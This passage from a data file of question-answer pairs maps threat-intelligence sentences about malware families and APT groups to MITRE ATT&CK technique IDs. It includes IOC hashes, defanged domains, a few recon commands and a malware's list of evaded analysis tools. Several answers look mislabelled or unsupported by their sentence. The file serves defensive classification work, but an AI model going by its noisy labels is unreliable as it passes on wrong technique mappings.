framework.,“win32_remote“,”win64_remote64“,”ollydbg“,”ProcessHacker“,”tcpview“,”autoruns“,”autorunsc“,”filemon“,”procmon“,”regmon“,”procexp“,”idaq“,”idaq64“,”ImmunityDebugger“,”Wireshark“,”dumpcap“,”HookExplorer“,”ImportREC“,”PETools“,”LordPE“,”dumpcap“,”SysInspector“,”proc_analyzer“,”sysAnalyzer“,”sniff_hit“,”windbg“,”joeboxcontrol“,”joeboxserver“ Blacklisted process names in the malware In some cases, it calculates the checksum of each running process name, and if it matches any hard-coded checksums, it causes a BSOD via the ntdll.dll “NtRaiseHardError” function### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The IRC variant of MPK has a command set (Table 2) that makes this an effective backdoor Trojan, specifically allowing the actors to steal credentials from the targeted system via keylogging, to navigate and interact with the file system, to run arbitrary commands, and to download and execute additional tools on the system### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BadPatch captures screenshots in .jpg format and then exfiltrates them.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shamoon has used HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkComet can list active processes running on the victim’s machine.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Timestomping is a technique that modifies the timestamps of a file , often to mimic files that are in the same folder.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has used VBScript to initiate the delivery of payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has enumerated hosts, looking for the system's machine name.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerShower has the ability to encode C2 communications with base64 encoding.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoxCaon can upload files from a compromised host.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADFLICK has been distributed via spearphishing campaigns containing malicious Microsoft Word documents.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services.### Assistant: T1597: Search Closed Sources" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Egregor can enumerate all connected drives.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse PowerShell commands and scripts for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LockerGoga has been observed changing account passwords and logging off current users.### Assistant: T1531: Account Access Removal" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,First, the sample is UPX packed### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads.### Assistant: T1620: Reflective Code Loading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity can identify if ESET or BitDefender antivirus are installed before dropping its payload.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Domain accounts can cover user, administrator, and service accounts.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak can determine the Windows version and computer name on a compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32's backdoor can query the Windows Registry to gather system information.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Backdoor.Oldrea collects the current username from the victim.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The attack involved a spear-phishing email with a subject of “Project Offer” and a malicious Word document (SHA256: d393349a4ad00902e3d415b622cf27987a0170a786ca3a1f991a521bff645318) as an attachment### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes has used Base64 to encode C2 communications.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BendyBear has encrypted payloads using RC4 and XOR.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fysbis has established persistence using a systemd service.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has also encoded files using Base64.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla has used ProcessWindowStyle.Hidden to hide windows.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To operate and evade standard analysis tools, most of the functions are hashed### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TSCookie has the ability to execute shell commands on the infected host.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file – two versions of the same LNK file and VBScript technique### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpeakUp uses cron tasks to ensure persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If Adobe Flash or Microsoft Silverlight is no longer required, DHS recommends that those applications be removed from systems.The IOCs provided with this alert include IP addresses determined to be part of the HIDDEN COBRA botnet infrastructure, identified as DeltaCharlie### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Data field is encrypted using a custom stream cipher.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil has encrypted C2 communications with the ECIES algorithm.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kasidet has the ability to initiate keylogging and screen captures.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used the command-line interface for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pisloader has commands to list drives on the victim machine and to list file information for a given directory.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The interactive shell uses the ~/.zshrc to configure the user environment.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WannaCry uses attrib +h and icacls .### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has enumerated DC servers using the command net group ""Domain Controllers"" /domain.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Python code can also be compiled into binary executables.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT has been distributed as HTA files with JScript.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RogueRobin checks the running processes for evidence it may be running in a sandbox environment.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can also use NETEAGLE to establish an RDP connection with a controller over TCP/7519.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet attempts to access network resources with a domain account’s credentials.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Indrik Spider used Cobalt Strike to carry out credential dumping using ProcDump.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson can set a Registry key to determine how long it has been installed and possibly to indicate the version number.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon's plist files.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries is implemented at a lower level.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bad Rabbit’s infpub.dat file uses NTLM login credentials to brute force Windows machines.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nomadic Octopus has used PowerShell for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ROKRAT use HTTPS for all command and control communication methods.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,We found a brute-force tool called NLBrute , with configuration files that tell us it had been set up to use an included set of username and passwords to try to break in to machines that have Remote Desktop enabled### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MechaFlounder has the ability to run commands on a compromised host.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE can use crontabs to establish persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Azorult can download and execute additional files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also compromise existing commands in the operating system to produce false output to mislead defenders.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has enumerated hosts, looking for the public IP address of the system.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,And, according to the collected config files, the group upgraded their malware communications from plain text http to encrypted https in October 2013### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Its use of a PowerShell payload means that only legitimate system processes are utilized and that the malicious code execution can only be identified through enhanced logging or in memory### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Octopus has exfiltrated data to file sharing sites.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once a user has double-clicked the embedded image, the form executes a VB setup script### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZeroT gathers the victim's computer name, Windows version, and system language, and then sends it to its C2 server.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak has copied legitimate service names to use for malicious services.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE can inject code into system processes including notepad.exe, svchost.exe, and vbc.exe.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HELLOKITTY can enumerate logical drives on a target system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper is capable of enumerating the running processes on the system using pslist.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Before being appended to image files, HAMMERTOSS commands are encrypted with a key composed of both a hard-coded value and a string contained on that day's tweet.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Resource fork content may also be obfuscated/encrypted until execution.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has used .iso files to deploy malicious .lnk files.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has cleared logs during post compromise cleanup activities.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.### Assistant: T1221: Template Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In addition, multiple APT40 command and control (C2) domains were initially registered by China based domain resellers and had Whois records with Chinese location information, suggesting a China based infrastructure procurement process### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,""Are you Happy?"" campaign.""FreeMilk"" campaign.""North Korean Human Rights"" campaign.""Evil New Year 2018"" campaign.On January 2nd of 2018, the ""Evil New Year 2018"" was started### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,can collect the victim user name.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HD Creates a file in the Temp path and names it “hd” + PCID then invokes another program module named hd.test1 to identify logical drives### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kobalos can exfiltrate credentials over the network via UDP.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Patchwork payload deletes Resiliency Registry keys created by Microsoft Office applications in an apparent effort to trick users into thinking there were no issues during application runs.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium, to pack their implants.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higaisa used HTTP and HTTPS to send data back to its C2 server.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After applying this decryption algorithm, we are presented with the following data: h=HOSTNAME-PC&f=mission.ini&c=& The response made by the C2 server uses the same RC4 key for encryption### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used HTTP for network communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tonto Team abuses a legitimate and signed Microsoft executable to launch a malicious DLL.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework., master boot record wiper ### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEMP.Veles has used a VPN to persist in the victim environment.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may collect the keychain storage data from a system to acquire credentials.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,appinit_dll### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FELIXROOT encrypts strings in the backdoor using a custom XOR algorithm.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group has also used the Plink utility and other tools to create tunnels to C2 servers.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pillowmint has encrypted stolen credit card information with AES and further encoded it with Base64.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,at can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account .### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 7: The same de-obfuscated code as Figure 2 The only other script content of the blog-page[.]html is an empty script section### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kerrdown can download specific payloads to a compromised host based on OS architecture.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FlawedAmmyy has used HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Netwalker can delete the infected system's Shadow Volumes to prevent recovery.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KGH_SPY can collect drive information from a compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT can list local services.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic .### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Transparent Tribe has crafted VBS-based malicious documents.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Most of them manipulate the machine to download and execute different files### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A thorough explanation of what information is collected can be found in a breakdown by Cofense from late 2018.  The script verifies all parts of the malware have been downloaded.  After downloading the payload, the XSL script checks to make sure every piece of the malware was downloaded.  One of the twelve download commands as detected by the Cybereason platform in same variant of Astaroth.  The twelve downloaded files### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NotPetya drops PsExec with the filename dllhost.dat.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RATANKBA uses the command reg query “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\InternetSettings”.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used Google Chrome browser extensions to infect victims and to steal passwords and cookies.### Assistant: T1176: Browser Extensions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FELIXROOT uses Rundll32 for executing the dropper program.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Spearphishing via service is a specific variant of spearphishing.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used scheduled tasks to establish persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lurid performs XOR encryption.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAWKBALL is a backdoor that communicates to a single hard-coded C2 server using HTTP### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some FinFisher variants incorporate an MBR rootkit.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dyre has a command to download and executes additional files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AutoFocus customers may learn more from the DarkHydrus tag IOC Related SHA256 Hashes Payloads cec36e8ed65ac6f250c05b4a17c09f58bb80c19b73169aaf40fa15c8d3a9a6a1 ac7f9c536153780ccbec949f23b86f3d16e3105a5f14bb667df752aa815b0dc4 a547a02eb4fcb8f446da9b50838503de0d46f9bb2fd197c9ff63021243ea6d88 d428d79f58425d831c2ee0a73f04749715e8c4dd30ccd81d92fe17485e6dfcda dd2625388bb2d2b02b6c10d4ee78f68a918b25ddd712a0862bcf92fa64284ffa b2571e3b4afbce56da8faa726b726eb465f2e5e5ed74cf3b172b5dd80460ad81 c8b3d4b6acce6b6655e17255ef7a214651b7fc4e43f9964df24556343393a1a3 ce84b3c7986e6a48ca3171e703e7083e769e9ced1bbdd7edf8f3eab7ce20fd00 99541ab28fc3328e25723607df4b0d9ea0a1af31b58e2da07eff9f15c4e6565c Delivery documents d393349a4ad00902e3d415b622cf27987a0170a786ca3a1f991a521bff645318 8063c3f134f4413b793dfc05f035b6480aa1636996e8ac4b94646292a5f87fde 9eac37a5c675cd1750cd50b01fc05085ce0092a19ba97026292a60b11b45bf49 cf9b2b40ac621aaf3241ff570bd7a238f6402102c29e4fbba3c5ce0cb8bc25f9 0a3d5b2a8ed60e0d96d5f0d9d6e00cd6ab882863afbb951f10c395a3d991fbc1 0b1d5e17443f0896c959d22fa15dadcae5ab083a35b3ff6cb48c7f967649ec82 870c8b29be2b596cc2e33045ec48c80251e668abd736cef9c5449df16cf2d3b8 ff0b59f23630f4a854448b82f1f0cd66bc4b1124a3f49f0aecaca28309673cb0 01fd7992aa71f4dca3a3766c438fbabe9aea78ca5812ab75b5371b48bd2625e2 6dcb3492a45a08127f9816a1b9e195de2bb7e0731c4e7168392d0e8068adae7a 47b8ad55b66cdcd78d972d6df5338b2e32c91af0a666531baf1621d2786e7870 776c056096f0e73898723c0807269bc299ae3bbd8e9542f0a1cbba0fd3470cb4 cf7863e023475d695c6f72c471d314b8b1781c6e9087ff4d70118b30205da5f0 e88045931b9d99511ce71cc94f2e3d1159581e5eb26d4e05146749e1620dc678 26e641a9149ff86759c317b57229f59ac48c5968846813cafb3c4e87c774e245 b5cfaac25d87a6e8ebabc918facce491788863f120371c9d00009d78b6a8c350 ad3fd1571277c7ce93dfbd58cee3b3bec84eeaf6bb29a279ecb6a656028f771c Related Domains maccaffe[.]com cisc0[.]net 0utl00k[.]net msdncss[.]com 0ffice[.]com 0ffiice[.]com micrrosoft[.]net anyconnect[.]stream bigip[.]stream fortiweb[.]download kaspersky[.]science microtik[.]stream owa365[.]bid symanteclive[.]download windowsdefender[.]win allexa[.]net kaspersky[.]host hotmai1[.]com 0utlook[.]bid### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EVILNUM can achieve persistence through the Registry Run key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Establishing a persona on social media may require development of additional documentation to make them seem real.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CookieMiner can download additional scripts from a web server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources.### Assistant: T1528: Steal Application Access Token" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fysbis has the ability to search for files.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BOOSTWRITE has been signed by a valid CA.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can instruct Duqu to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials .### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A list of all shims currently installed by the default Windows installer is kept in: * %WINDIR%\AppPatch\sysmain.sdb and * hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb Custom databases are stored in: * %WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom and * hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In green, functions from Keychaindump C&C communication Keydnap is using the onion.to Tor2Web proxy over HTTPS to report back to its C&C server### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 has embedded malicious code into websites to screen a potential victim's IP address and then exploit their browser if they are of interest.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, an adversary in a privileged user context administrator may spawn a new process and assign the parent as a process running as SYSTEM , causing the new process to be elevated via the inherited access token.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct Phishing for Information or Phishing.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 clears Window Event logs and Sysmon logs from the system.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy has the capability to upload dumper tools that extract credentials from web browsers and store them in database files.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It will then connect to the system with RegConnectRegistryW and modify the Registry to disable UAC remote restrictions by setting SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy to 1.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conti can discover files on a local system.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search CDN data to gather actionable information.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hancitor has used a macro to check that an ActiveDocument shape object in the lure message is present.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Prikormka contains a module that collects documents with certain extensions from removable media or fixed drives connected via USB.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DustySky captures PNG screenshots of the main screen.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSInfo performs a connection test to discover remote systems in the network Olympic Destroyer uses Windows Management Instrumentation to enumerate all systems in the network.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For each executable, ThiefQuest prepends a copy of itself to the beginning of the file.### Assistant: T1554: Compromise Client Software Binary" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLUELIGHT has exfiltrated data over its C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook is capable of taking an image of and uploading the current desktop.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can use a command such as tell application “System Events” to make login item at end with properties /path/to/executable.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has searched the victim system for the InstallUtil.exe program and its version.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine or data storage snapshots through the cloud management dashboard or cloud APIs.### Assistant: T1578: Modify Cloud Compute Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has dropped payload and configuration files to disk.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanoCore can capture audio feeds from the system.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Victim system reconnaissance The code then tries to obtain the victim’s public IP via “https://api.ipify.org/”### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Two modifications are made to UPX version 3.91: The magic bytes UPX! in the UPX header are replaced with ASS7, The decompressed code and strings sections are XORed with 0x01### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BS2005 uses Base64 encoding for communication in the message body of an HTTP request.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,watch/? search/? find/? results/? open/? search/? close/? The “ai” value stands for the payload title### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.### Assistant: T1127: Trusted Developer Utilities Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KeyBoy exploits the vulnerability CVE-2012-0158 for execution.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has used PowerShell to run a series of base64-encoded commands, that acted as a stager and enumerated hosts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can send stolen information to C2 nodes including passwords, accounts, and emails.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from 